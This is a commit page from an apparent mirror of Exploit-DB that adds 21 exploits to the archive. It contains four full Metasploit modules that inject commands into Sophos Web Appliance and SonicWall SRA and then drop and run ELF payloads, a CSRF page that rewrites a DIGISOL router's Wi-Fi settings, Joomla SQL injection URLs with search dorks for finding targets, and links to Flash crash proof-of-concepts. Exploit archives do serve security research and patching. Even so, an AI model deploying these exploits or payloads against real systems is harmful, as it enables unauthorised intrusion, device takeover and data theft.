bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-02-22

Browse source 
21 new exploits

Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption
Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access
Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check
Adobe Flash - MP4 AMF Parsing Overflow
Adobe Flash - SWF Stack Corruption
Adobe Flash - Use-After-Free in Applying Bitmap Filter
Adobe Flash - YUVPlane Decoding Heap Overflow
DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery
Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection
Joomla! Component J-CruiseReservation Standard 3.0 - 'city' Parameter SQL Injection
Joomla! Component Eventix Events Calendar 1.0 - SQL Injection
Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - 'review_id' Parameter SQL Injection
Joomla! Component Directorix Directory Manager 1.1.1 - SQL Injection
Joomla! Component Magic Deals Web 1.2.0 - SQL Injection
Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection
Joomla! Component AppointmentBookingPro 4.0.1 - SQL Injection
Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)
Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)
Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)
Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)
AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)
This commit is contained in:
Offensive Security 2017-02-22 05:01:19 +00:00
parent 4195f70ade
commit ad7bd81657
22 changed files with 1573 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

21
files.csv
View file

@ -5372,6 +5372,13 @@ id,file,description,date,author,platform,type,port
41365,platforms/windows/dos/41365.txt,"NVIDIA Driver 375.70 - Buffer Overflow in Command Buffer Submission",2017-02-15,"Google Security Research",windows,dos,0
41367,platforms/windows/dos/41367.txt,"GOM Player 2.3.10.5266 - '.fpx' Denial of Service",2017-02-15,"Peter Baris",windows,dos,0
41369,platforms/hardware/dos/41369.txt,"Cisco ASA - WebVPN CIFS Handling Buffer Overflow",2017-02-15,"Google Security Research",hardware,dos,0
41417,platforms/windows/dos/41417.txt,"Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption",2017-02-21,"Google Security Research",windows,dos,0
41418,platforms/windows/dos/41418.txt,"Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access",2017-02-21,"Google Security Research",windows,dos,0
41419,platforms/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",windows,dos,0
41420,platforms/multiple/dos/41420.txt,"Adobe Flash - MP4 AMF Parsing Overflow",2017-02-21,"Google Security Research",multiple,dos,0
41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
41423,platforms/multiple/dos/41423.txt,"Adobe Flash - YUVPlane Decoding Heap Overflow",2017-02-21,"Google Security Research",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -37320,3 +37327,17 @@ id,file,description,date,author,platform,type,port
41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0
41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0
41404,platforms/hardware/webapps/41404.html,"DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery",2017-02-21,Indrajith.A.N,hardware,webapps,0
41405,platforms/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
41406,platforms/php/webapps/41406.txt,"Joomla! Component J-CruiseReservation Standard 3.0 - 'city' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
41407,platforms/php/webapps/41407.txt,"Joomla! Component Eventix Events Calendar 1.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
41408,platforms/php/webapps/41408.txt,"Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
41409,platforms/php/webapps/41409.txt,"Joomla! Component Directorix Directory Manager 1.1.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
41410,platforms/php/webapps/41410.txt,"Joomla! Component Magic Deals Web 1.2.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
41411,platforms/php/webapps/41411.txt,"Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
41412,platforms/php/webapps/41412.txt,"Joomla! Component AppointmentBookingPro 4.0.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
41413,platforms/hardware/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0
41414,platforms/hardware/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0
41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0

Can't render this file because it is too large.

33
platforms/hardware/webapps/41404.html Executable file
View file

@ -0,0 +1,33 @@
<html>
Digisol Router CSRF Exploit - Indrajith A.N
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="apssid" value="hacked" />
<input type="hidden" name="startScanUplinkAp" value="0" />
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value="hacked" />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="6" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method&#95;cur" value="6" />
<input type="hidden" name="method" value="6" />
<input type="hidden" name="authType" value="2" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value="csrf1234" />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

176
platforms/hardware/webapps/41413.rb Executable file
View file

@ -0,0 +1,176 @@
# Exploit Title: Sophos Web Appliance UnBlock/Block-IP Remote Command Injection Vulnerablity
# Date: 12/12/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sophos.com
# Software Link: sophos.com/en-us/products/secure-web-gateway.aspx
# Version: 4.2.1.3
# Tested on: 4.2.1.3
#
# CVE : CVE-2016-9553
# vuln 1: unblockip parameter / MgrReport.php exploit
# vuln 2: blockip parameter / MgrReport.php exploit
# Description PostAuth Sophos Web App FW <= v4.2.1.3 for capablities. This exploit leverages a command injection bug.
#
# xort @ Critical Start
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sophos Web Appliace <= v4.2.1.3 block/unblock remote exploit',
'Description' => %q{
This module exploits two 2 seperate remote command injecection vulnerabilities in
the Sophos Web Appliace Version <= v4.2.1.3 the web administration interface.
By sending a specially crafted request it's possible to inject system
commands
},
'Author' =>
[
'xort', # vuln + metasploit module
],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
[
'blockip method',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'VulnName' => 'blockip',
'VulnNum' => '1',
},
],
[
'unblockip method',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'VulnName' => 'unblockip',
'VulnNum' => '2',
},
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(443),
], self.class)
end
def do_login(username, password_clear)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 11550;
style_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/index.php",
'vars_get' => {
'c' => 'login',
},
'vars_post' =>
{
'STYLE' => style_key,
'destination' => '',
'username' => username,
'password' => password_clear,
}
}, timeout)
return style_key
end
def run_command(username, style_password, cmd)
vprint_status( "Running Command...\n" )
# random attack method from calling methods into
calling_commands = [ 'report','trend_volume','trend_suspect','top_app_ctrl','perf_latency','perf_throughput','users_browse_summary','traf_sites','traf_blocked','traf_users','users_virus_downloaders','users_pua_downloaders','users_highrisk','users_policy_violators','users_top_users_by_browse_time','users_quota','users_browse_time_by_user','users_top_users_by_category','users_site_visits_by_user','users_category_visits_by_user','users_monitored_search_queries','users_app_ctrl','traf_category','traf_download' ,'warned_sites' ]
# select random calling page that calls the vulnerable page MgrReport.php where the vulns are
attack_method = calling_commands[rand(calling_commands.length)]
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
vprint_status( "Attacking Vuln #" + target['VulnNum']+ " - " + target['VulnName'] + " with " + attack_method + "command method" )
res = send_request_cgi({
'method' => 'GET',
'uri' => '/index.php?c=trend_suspect&' + target['VulnName'] + '=1.2.3.6`'+ cmd +'`&STYLE='+style_password
})
end
def exploit
# timeout
timeout = 1550;
# params
password_clear = datastore['PASSWORD']
user = datastore['USERNAME']
style_hash = do_login(user, password_clear)
vprint_status("STATUS hash authenticated: #{style_hash}\n")
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, style_hash, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\x\1\2')
# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
run_command(user, style_hash, ("echo%20-e%20#{encoded_elf}\>%20/tmp/m\;chmod%20%2brx%20/tmp/m\;/tmp/m"))
# wait for magic
handler
end
end
end

168
platforms/hardware/webapps/41414.rb Executable file
View file

@ -0,0 +1,168 @@
# Exploit Title: Sophos Web Appliance diagnostic_tools wget Remote Command Injection Vulnerablity
# Date: 12/12/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sophos.com
# Software Link: sophos.com/en-us/products/secure-web-gateway.aspx
# Version: 4.2.1.3
# Tested on: 4.2.1.3
#
# CVE : CVE-2016-9554
# vuln: diagnostic_tools command / host parameter / MgrReport.php exploit
# Description PostAuth Sophos Web App FW <= v4.2.1.3 for capablities. This exploit leverages a command injection bug.
#
# xort @ Critical Start
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sophos Web Appliace <= v4.2.1.3 remote exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Sophos Web Appliace Version <= v4.2.1.3. The vulnerability exist in
a section of the machine's adminstrative infertface for performing diagnostic
network test with wget and unsanitized unser supplied information.
},
'Author' =>
[
'xort@Critical Start', # vuln + metasploit module
],
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(443),
], self.class)
end
def do_login(username, password_clear)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
style_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/index.php",
'vars_get' => {
'c' => 'login',
},
'vars_post' =>
{
'STYLE' => style_key,
'destination' => '',
'section' => '',
'username' => username,
'password' => password_clear,
}
}, timeout)
return style_key
end
def run_command(username, style_password, cmd)
vprint_status( "Running Command...\n" )
# send request with payload
res = send_request_cgi({
'method' => 'POST',
'vars_post' => {
'action' => 'wget',
'section' => 'configuration',
'STYLE' => style_password ,
'url' => 'htt%3a%2f%2fwww.google.com%2f`'+cmd+'`',
},
'vars_get' => {
'c' => 'diagnostic_tools',
},
})
end
def exploit
# timeout
timeout = 1550;
# params
password_clear = datastore['PASSWORD']
user = datastore['USERNAME']
# do authentication
style_hash = do_login(user, password_clear)
vprint_status("STATUS hash authenticated: #{style_hash}\n")
# pause to let things run smoothly
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, style_hash, ("sudo%20/bin/rm%20-f%20/tmp/n%20;printf%20\"#{encoded_cmd}\"%20>%20/tmp/n;%20chmod%20+rx%20/tmp/n;/tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\x\1\2')
# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
run_command(user, style_hash, ("echo%20-e%20#{encoded_elf}\>%20/tmp/m\;chmod%20%2brx%20/tmp/m\;/tmp/m"))
# wait for magic
handler
end
end
# sophox-release
end

208
platforms/hardware/webapps/41415.rb Executable file
View file

@ -0,0 +1,208 @@
# Exploit Title: Sonicwall extensionsettings scriptname Remote Command Injection Vulnerablity
# Date: 12/25/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sonicwall.com
# Software Link: sonicwall.com/products/sra-virtual-appliance
# Version: 8.1.0.2-14sv
# Tested on: 8.1.0.2-14sv
#
# CVE : (awaiting cve)
# vuln: extensionsettings.cgi / scriptfile (filename) parameter /
# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug.
#
# xort @ Critical Start
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv remote exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in
a section of the machine's adminstrative infertface for performing configurations
related to on-connect scripts to be launched for users's connecting.
},
'Author' =>
[
'xort@Critical Start', # vuln + metasploit module
],
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(443),
], self.class)
end
def do_login(username, password_clear)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
style_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-bin/userLogin",
'headers' => {
'Connection' => 'close',
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
},
'vars_post' => {
'username' => username,
'password' => password_clear,
'domain' => 'LocalDomain',
'loginButton' => 'Login',
'state' => 'login',
'login' => 'true',
'VerifyCert' => '0',
'portalname' => 'VirtualOffice',
'ajax' => 'true'
},
}, timeout)
swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
return swap
end
def run_command_spliced(username, swap_cookie, cmd)
vprint_status( "Running Command...\n" )
# send request with payload
res = send_request_cgi({
'method' => 'GET',
# 'uri' => "/cgi-bin/diagnostics?currentTSREmailTo=|#{cmd}|x&tsrEmailCurrent=true",
'uri' => "/cgi-bin/diagnostics",
'vars_get' => {
'tsrEmailCurrent' => 'true',
'currentTSREmailTo' => '|'+cmd+'|x',
},
'headers' => {
'Cookie' => 'swap='+swap_cookie+';',
'Content-Type' => 'text/plain; charset="iso-8859-1"',
'Connection' => 'close',
},
}, 30 )
end
def run_command(username, swap_cookie, cmd)
write_mode = ">"
dump_file = "/tmp/qq"
# base64 - encode with base64 so we can send special chars and multiple lines
#cmd_encoded = Base64.strict_encode64(cmd)
cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
vprint_status("cmd_encoded = #{cmd_encoded}")
for cmd_chunk in cmd_encoded.split(/(....................................................................................................)/)
cmd_new = "printf%20\"#{cmd_chunk}\"#{write_mode}#{dump_file}"
#cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}".gsub("+", "_")
# set to normal append for loops after the first round
if write_mode == ">"
write_mode = ">>"
end
# add cmd to array to be exected later
run_command_spliced(username, swap_cookie, cmd_new)
end
# execute payload stored at dump_file
run_command_spliced(username, swap_cookie, "chmod%20777%20/tmp/qq;sh%20/tmp/qq")
end
def exploit
# timeout
timeout = 1550;
# params
password_clear = datastore['PASSWORD']
user = datastore['USERNAME']
# do authentication
swap_cookie = do_login(user, password_clear)
vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
vprint_status("encoded_cmd = #{encoded_cmd}")
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, swap_cookie, ("sudo /bin/rm -f /tmp/n;printf \"#{encoded_cmd}\">/tmp/n;chmod +rx /tmp/n;/tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
vprint_status("encoded_elf = #{encoded_elf}")
# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
run_command(user, swap_cookie, ("echo -e \"#{encoded_elf}\"\>/tmp/m\;chmod +rx /tmp/m\;/tmp/m"))
# wait for magic
handler
end
end
# sophox-release
end

195
platforms/hardware/webapps/41416.rb Executable file
View file

@ -0,0 +1,195 @@
# Exploit Title: Sonicwall viewcert.cgi CGI Remote Command Injection Vulnerablity
# Date: 12/24/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sonicwall.com
# Software Link: sonicwall.com/products/sra-virtual-appliance
# Version: 8.1.0.2-14sv
# Tested on: 8.1.0.2-14sv
#
# CVE : (awaiting cve)
# vuln: viewcert.cgi / CERT parameter
# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug.
#
# xort @ Critical Start
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv viewcert.cgi remote exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in
a section of the machine's adminstrative infertface for performing configurations
related to on-connect scripts to be launched for users's connecting.
},
'Author' =>
[
'xort@Critical Start', # vuln + metasploit module
],
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(443),
], self.class)
end
def do_login(username, password_clear)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-bin/userLogin",
'headers' => {
'Connection' => 'close',
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
},
'vars_post' => {
'username' => username,
'password' => password_clear,
'domain' => 'LocalDomain',
'loginButton' => 'Login',
'state' => 'login',
'login' => 'true',
'VerifyCert' => '0',
'portalname' => 'VirtualOffice',
'ajax' => 'true'
},
}, timeout)
swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
return swap
end
def run_command(swap_cookie, cmd)
# vars
timeout = 1550;
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-bin/viewcert",
'data' => "buttontype=delete&CERT=newcert-1`#{cmd}`",
'headers' =>
{
'Cookie' => "swap=#{swap_cookie}",
},
}, timeout)
end
def run_command_spliced(swap_cookie, cmd)
write_mode = ">"
dump_file = "/tmp/qq"
reqs = 0
cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
for cmd_chunk in cmd_encoded.split(/(....................................)/)
cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}"
reqs += 1
vprint_status("Running Command (#{reqs})\n")
# set to normal append for loops after the first round
if write_mode == ">"
write_mode = ">>"
end
# add cmd to array to be exected later
run_command(swap_cookie, cmd_new)
end
# vprint_status("Running Final Command ...\n")
# execute payload stored at dump_file
run_command(swap_cookie, "chmod +x /tmp/qq; sh /tmp/qq")
end
def exploit
# timeout
timeout = 1550;
# params
password_clear = datastore['PASSWORD']
user = datastore['USERNAME']
# do authentication
swap_cookie = do_login(user, password_clear)
vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
run_command_spliced(swap_cookie, "printf \"#{encoded_elf}\">/tmp/m;chmod +rx /tmp/m;/tmp/m")
# wait for magic
handler
end
end
end

7
platforms/multiple/dos/41420.txt Executable file
View file

@ -0,0 +1,7 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1018
There is an overflow in MP4 AMF parsing. To reproduce, put the attached files on a server and visit http://127.0.0.1/LoadMP4.swf?file=unsigned.mp4.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41420.zip

7
platforms/multiple/dos/41421.txt Executable file
View file

@ -0,0 +1,7 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1013
The attached fuzzed swf causes stack corruption when it is loaded, likely due to the parsing of the SWF file.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41421.zip

7
platforms/multiple/dos/41422.txt Executable file
View file

@ -0,0 +1,7 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1007
The attached swf causes a use-after-free in applying bitmap filters.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41422.zip

9
platforms/multiple/dos/41423.txt Executable file
View file

@ -0,0 +1,9 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1008
The attached FLV file causes a heap overflow in YUVPlane decoding.
To reproduce, put LoadMP4.swf and yuvplane.flv on a server, and visit 127.0.0.1/LoadMP4.swf?file=yvplane.flv.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41423.zip

18
platforms/php/webapps/41405.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component J-HotelPortal v6.0.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_jhotelreservation
# Date: 21.02.2017
# Vendor Homepage: http://www.cmsjunkie.com/
# Software Buy: http://www.cmsjunkie.com/joomla-hotel-portal
# Demo: http://hoteldemo.cmsjunkie.com/j3/portal/
# Version: 6.0.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL]
# Etc...
# # # # #

18
platforms/php/webapps/41406.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component J-CruiseReservation Standard v3.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_jcruisereservation
# Date: 21.02.2017
# Vendor Homepage: http://www.cmsjunkie.com/
# Software Buy: http://www.cmsjunkie.com/ajax/index/options/product_id/58/
# Demo: http://demo.cmsjunkie.com/cruise/
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/cruises/cruises?city=[SQL]
# Etc...
# # # # #

19
platforms/php/webapps/41407.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component Eventix Events Calendar v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_eventix
# Date: 21.02.2017
# Vendor Homepage: http://informafix.fr/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/eventix-events-calendar/
# Demo: http://demo.informafix.fr/index.php?option=com_eventix
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=2017-02-16&day=[SQL]
